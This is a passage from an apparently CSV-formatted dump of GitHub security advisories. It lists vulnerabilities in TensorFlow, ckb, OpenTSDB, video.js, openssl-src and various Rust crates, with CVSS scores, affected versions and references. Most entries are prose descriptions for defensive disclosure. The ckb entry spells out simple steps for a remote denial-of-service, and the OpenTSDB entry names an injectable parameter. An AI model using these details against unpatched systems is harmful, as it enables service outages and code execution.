for dealloc assumes that encoding succeeded, but segfaults when a string tensor is garbage collected whose encoding failed (e.g., due to mismatched dimensions). + +To fix this, the call to set the finalizer function is deferred until `NewTensor` returns and, if encoding failed for a string tensor, deallocs are determined based on bytes written. + +### Patches +We have patched the issue in GitHub commit [8721ba96e5760c229217b594f6d2ba332beedf22](https://github.com/tensorflow/tensorflow/commit/8721ba96e5760c229217b594f6d2ba332beedf22) (merging [#50508](https://github.com/tensorflow/tensorflow/pull/50508)). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, which is the other affected version. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported externally via a [fixing PR](https://github.com/tensorflow/tensorflow/pull/50508).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cmgw-8vpc-rc59'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37692'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/pull/50508'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8721ba96e5760c229217b594f6d2ba332beedf22'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T18:47:39Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-48vq-8jqv-gm6f,2021-08-02T21:53:41Z,2021-08-25T21:01:23Z,,[],Remote memory exhaustion in ckb,"In the ckb sync protocol, SyncState maintains a HashMap called 'misbehavior' that keeps a score of a peer's violations of the protocol. This HashMap is keyed to PeerIndex (an alias for SessionId), and entries are never removed from it. SessionId is an integer that increases monotonically with every new connection. + +A remote attacker can manipulate this HashMap to grow forever, resulting in degraded performance and ultimately a panic on allocation failure or being killed by the OS, depending on the platform. + +This is a critical severity security bug. It could be exploited to create a targeted or network-wide denial of service, to reduce the hash power of the network as part of a 51% attack, and perhaps in other creative ways. + +An attack is trivial: + +1. connect to another node +2. send an invalid sync protocol request, such as `SendHeaders` for non-consecutive blocks +3. disconnect +4. repeat",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'ckb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.40.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nervosnetwork/ckb/security/advisories/GHSA-48vq-8jqv-gm6f'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0108.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T21:53:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-x2xg-6wcj-6xf9,2021-08-24T20:08:25Z,2021-08-25T14:49:48Z,,['CVE-2020-36474'],SafeCurl before 0.9.2 has a DNS rebinding vulnerability.,SafeCurl before 0.9.2 has a DNS rebinding vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'vanilla/safecurl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36474'}, {'type': 'WEB', 'url': 'https://github.com/vanilla/safecurl/pull/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/vanilla/safecurl/'}, {'type': 'WEB', 'url': 'https://github.com/vanilla/safecurl/releases/tag/v0.9.2'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T20:08:25Z', 'nvd_published_at': '2021-08-20T15:15:00Z'}" +1.4.0,GHSA-2v78-j59h-fmpf,2023-06-13T21:04:31Z,2021-08-25T20:43:23Z,,['CVE-2018-21000'],Heap overflow or corruption in safe-transmute,"Affected versions of this crate switched the length and capacity arguments in the Vec::from_raw_parts() constructor, which could lead to memory corruption or data leakage.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'safe-transmute'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.10.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-21000'}, {'type': 'WEB', 'url': 'https://github.com/nabijaczleweli/safe-transmute-rs/pull/36'}, {'type': 'WEB', 'url': 'https://github.com/nabijaczleweli/safe-transmute-rs/commit/a134e06d740f9d7c287f74c0af2cd06206774364'}, {'type': 'PACKAGE', 'url': 'https://github.com/nabijaczleweli/safe-transmute-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0013.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-686h-j8r8-wmfm,2021-08-24T17:53:47Z,2021-08-25T20:57:14Z,,['CVE-2020-36451'],Data races in rcu_cell,"Affected versions of this crate unconditionally implement Send/Sync for `RcuCell`. +This allows users to send `T: !Send` to other threads (while `T` enclosed within `RcuCell`), and allows users to concurrently access `T: !Sync` by using the APIs of `RcuCell` that provide access to `&T`. + +This can result in memory corruption caused by data races.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rcu_cell'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36451'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/rcu_cell/issues/3'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/rcu_cell/pull/4'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/rcu_cell/pull/4/commits/1faf18eee11f14969b77ae0f76dcd9ebd437d0c2'}, {'type': 'PACKAGE', 'url': 'https://github.com/Xudong-Huang/rcu_cell'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0131.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:29:49Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-79wf-qcqv-r22r,2021-08-18T21:21:03Z,2021-08-25T20:56:00Z,,['CVE-2021-38196'],Remote code execution in better-macro,"An issue was discovered in the better-macro crate through 2021-07-22 for Rust. It intentionally demonstrates that remote attackers can execute arbitrary code via proc-macros, and otherwise has no legitimate purpose.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'better-macro'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38196'}, {'type': 'PACKAGE', 'url': 'https://github.com/raycar5/better-macro'}, {'type': 'WEB', 'url': 'https://github.com/raycar5/better-macro/blob/24ff1702397b9c19bbfa4c660e2316cd77d3b900/src/lib.rs#L36-L38'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0077.html'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:21:03Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-2xpg-3hx4-fm9r,2021-08-19T17:44:08Z,2021-08-25T20:53:20Z,,['CVE-2021-26957'],Out of bounds read in xcb,"An issue was discovered in the xcb crate through 2021-02-04 for Rust. It has a soundness violation because there is an out-of-bounds read in xcb::xproto::change_property(), as demonstrated by a format=32 T=u8 situation where out-of-bounds bytes are sent to an X server.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'xcb'}, 'ecosystem_specific': {'affected_functions': ['xcb::xproto::change_property']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26957'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/issues/653'}, {'type': 'PACKAGE', 'url': 'https://github.com/rtbo/rust-xcb'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0019.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:44:08Z', 'nvd_published_at': None}" +1.4.0,GHSA-g4w7-3qr8-5623,2021-08-19T21:18:44Z,2021-08-25T20:47:01Z,,['CVE-2020-35872'],Improper type usage in rusqlite,An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via the repr(Rust) type.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rusqlite'}, 'ecosystem_specific': {'affected_functions': ['rusqlite::Connection::get_aux', 'rusqlite::Connection::set_aux', 'rusqlite::session::Session::attach', 'rusqlite::session::Session::diff', 'rusqlite::trace::log', 'rusqlite::vtab::create_module']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35872'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/commit/71b2f5187b0cbace3f8b6ff53432ff2ca0defcf0'}, {'type': 'PACKAGE', 'url': 'https://github.com/rusqlite/rusqlite'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}]","{'cwe_ids': ['CWE-351'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:18:44Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-pp7m-6j83-m7r6,2021-08-31T21:01:29Z,2021-08-10T16:09:36Z,,['CVE-2021-23414'],Cross-site Scripting in video.js,"This affects the package video.js before 7.14.3. + The src attribute of track tag allows to bypass HTML escaping and execute arbitrary code. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'video.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.14.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23414'}, {'type': 'WEB', 'url': 'https://github.com/videojs/video.js/commit/b3acf663641fca0f7a966525a72845af7ec5fab2'}, {'type': 'PACKAGE', 'url': 'https://github.com/videojs/video.js'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2DHYIIAUXUBHMBEDYU7TYNZXEN2W2SA2/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/74SXNGA5RIWM7QNX7H3G7SYIQLP4UUGV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NLRJB5JNKK3VVBLV3NH3RI7COEDAXSAB/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1533588'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1533587'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-VIDEOJS-1533429'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:36:58Z', 'nvd_published_at': '2021-07-28T08:15:00Z'}" +1.4.0,GHSA-7cjc-hvxf-gqh7,2021-08-19T21:18:16Z,2021-08-25T20:47:39Z,,['CVE-2020-35862'],Use after free and double free in bitvec,An issue was discovered in the bitvec crate before 0.17.4 for Rust. BitVec to BitBox conversion leads to a use-after-free or double free.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'bitvec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.17.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35862'}, {'type': 'WEB', 'url': 'https://github.com/myrrlyn/bitvec/issues/55'}, {'type': 'PACKAGE', 'url': 'https://github.com/myrrlyn/bitvec'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0007.html'}]","{'cwe_ids': ['CWE-415', 'CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:18:16Z', 'nvd_published_at': None}" +1.4.0,GHSA-hv53-q76c-7f8c,2021-07-26T18:11:42Z,2021-08-02T17:02:21Z,,['CVE-2020-35476'],OS Command Injection in OpenTSDB,A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.opentsdb:opentsdb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35476'}, {'type': 'WEB', 'url': 'https://github.com/OpenTSDB/opentsdb/issues/2051'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:11:42Z', 'nvd_published_at': '2020-12-16T08:15:00Z'}" +1.4.0,GHSA-4x25-pvhw-5224,2023-06-13T16:41:15Z,2021-08-25T20:44:20Z,,['CVE-2019-16143'],Algorithms compute incorrect results in blake2,"An issue was discovered in the blake2 crate before 0.8.1 for Rust. The BLAKE2b and BLAKE2s algorithms, when used with HMAC, produce incorrect results because the block sizes are half of the required sizes.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'blake2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16143'}, {'type': 'WEB', 'url': 'https://github.com/RustCrypto/MACs/issues/19'}, {'type': 'PACKAGE', 'url': 'https://github.com/RustCrypto/hashes/tree/master/blake2'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0019.html'}]","{'cwe_ids': ['CWE-327'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:54Z', 'nvd_published_at': '2019-09-09T12:15:00Z'}" +1.4.0,GHSA-p24j-h477-76q3,2021-09-09T16:57:53Z,2021-08-25T21:01:37Z,,['CVE-2021-36753'],Uncontrolled Search Path Element in sharkdp/bat,bat on windows before 0.18.2 executes programs named less.exe from the current working directory. This can lead to unintended code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'bat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36753'}, {'type': 'WEB', 'url': 'https://github.com/sharkdp/bat/pull/1724'}, {'type': 'WEB', 'url': 'https://github.com/sharkdp/bat/commit/bf2b2df9c9e218e35e5a38ce3d03cffb7c363956'}, {'type': 'PACKAGE', 'url': 'https://github.com/sharkdp/bat'}, {'type': 'WEB', 'url': 'https://github.com/sharkdp/bat/releases/tag/v0.18.2'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0106.html'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/53'}]","{'cwe_ids': ['CWE-427'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T16:44:50Z', 'nvd_published_at': '2021-07-15T20:15:00Z'}" +1.4.0,GHSA-vjmg-pc8h-p6p8,2021-08-19T17:22:11Z,2021-08-25T20:53:58Z,,['CVE-2021-28308'],Out of bounds read in fltk,An issue was discovered in the fltk crate before 0.15.3 for Rust. There is an out-of bounds read because the pixmap constructor lacks pixmap input validation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'fltk'}, 'ecosystem_specific': {'affected_functions': ['fltk::image::Pixmap::new']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28308'}, {'type': 'WEB', 'url': 'https://github.com/MoAlyousef/fltk-rs/issues/519'}, {'type': 'PACKAGE', 'url': 'https://github.com/MoAlyousef/fltk-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0038.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:22:11Z', 'nvd_published_at': None}" +1.4.0,GHSA-h45v-vgvp-3h5v,2023-06-13T20:54:35Z,2021-08-25T20:49:13Z,,['CVE-2020-35895'],Out-of-bounds write in stack,"ArrayVec::insert allows insertion of an element into the array object into the specified index. Due to a missing check on the upperbound of this index, it is possible to write out of bounds.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'stack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35895'}, {'type': 'WEB', 'url': 'https://github.com/arcnmx/stack-rs/issues/4'}, {'type': 'WEB', 'url': 'https://github.com/arcnmx/stack-rs/commit/369e55736f9bd29c37b1712afc2923f4028148c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/arcnmx/stack-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0042.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:53:42Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-84rm-qf37-fgc2,2021-08-19T17:35:19Z,2021-08-25T20:52:21Z,,['CVE-2021-23841'],Integer Overflow in openssl-src,"Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '111.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23841'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrichton/openssl-src-rs'}, {'type': 'WEB', 'url': 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0058'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0058.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202103-03'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210219-0009/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210513-0002/'}, {'type': 'WEB', 'url': 'https://support.apple.com/kb/HT212528'}, {'type': 'WEB', 'url': 'https://support.apple.com/kb/HT212529'}, {'type': 'WEB', 'url': 'https://support.apple.com/kb/HT212534'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4855'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20210216.txt'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-03'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-09'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/May/67'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/May/68'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/May/70'}]","{'cwe_ids': ['CWE-190', 'CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:35:19Z', 'nvd_published_at': '2021-02-16T17:15:00Z'}" +1.4.0,GHSA-gp6w-ccqv-p7qr,2021-08-24T20:06:36Z,2021-08-25T14:49:58Z,,['CVE-2021-3729'],firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3729'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/06d319cd71b7787aa919b3ba1ccf51e4ade67712'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d32f3d5a-0738-41ba-89de-34f2a772de76'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T20:06:36Z', 'nvd_published_at': '2021-08-23T13:15:00Z'}" +1.4.0,GHSA-wcxc-jf6c-8rx9,2021-08-18T20:24:24Z,2021-08-25T20:57:21Z,,[], Uncaught Exception in libpulse-binding,"Affected versions of this crate failed to catch panics crossing FFI boundaries via callbacks, which +is a form of UB. This flaw was corrected by [this commit][1] which was included in version 2.6.0.",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'libpulse-binding'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jnqnfe/pulse-binding-rust/commit/7fd282aef7787577c385aed88cb25d004b85f494'}, {'type': 'PACKAGE', 'url': 'https://github.com/jnqnfe/pulse-binding-rust'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0038.html'}]","{'cwe_ids': ['CWE-248'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:24:24Z', 'nvd_published_at': None}" +1.4.0,GHSA-3mf3-2gv9-h39j,2023-06-13T18:44:34Z,2021-08-25T20:53:14Z,,['CVE-2021-26308'],Uninitialized buffer use in marc,"Affected versions of this crate passes an uninitialized buffer to a user-provided Read implementation. (Record::read()). Arbitrary Read implementations can read from the uninitialized buffer (memory exposure) and also can return incorrect number of bytes written to the buffer. Reading from uninitialized memory produces undefined values that can quickly invoke undefined behavior. This flaw was fixed in commit 6299af0 by zero-initializing the newly allocated memory (via data.resize(len, 0)) instead of exposing uninitialized memory (unsafe { data.set_len(len) }).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'marc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26308'}, {'type': 'WEB', 'url': 'https://github.com/blackbeam/rust-marc/issues/7'}, {'type': 'WEB', 'url': 'https://github.com/blackbeam/rust-marc/commit/6299af0'}, {'type': 'PACKAGE', 'url': 'https://github.com/blackbeam/rust-marc'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0014.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:52:28Z', 'nvd_published_at': None}" +1.4.0,GHSA-jwph-qp5h-f9wj,2021-08-24T18:33:33Z,2021-08-25T20:59:18Z,,['CVE-2020-36450'],Data races in bunch,"An issue was discovered in the bunch crate through 2020-11-12 for Rust. +Affected versions of this crate unconditionally implements `Send`/`Sync` for `Bunch`. +This allows users to insert `T: !Sync` to `Bunch`. It is possible to create a data race to a `T: !Sync` by invoking the `Bunch::get()` API (which returns `&T`) from multiple threads. It is also possible to send `T: !Send` to other threads by inserting `T` inside `Bunch` and sending `Bunch` to another thread, allowing to create a data race by inserting types like `T = Rc<_>`. + +Such data races can lead to memory corruption.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'bunch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36450'}, {'type': 'WEB', 'url': 'https://github.com/krl/bunch/issues/1'}, {'type': 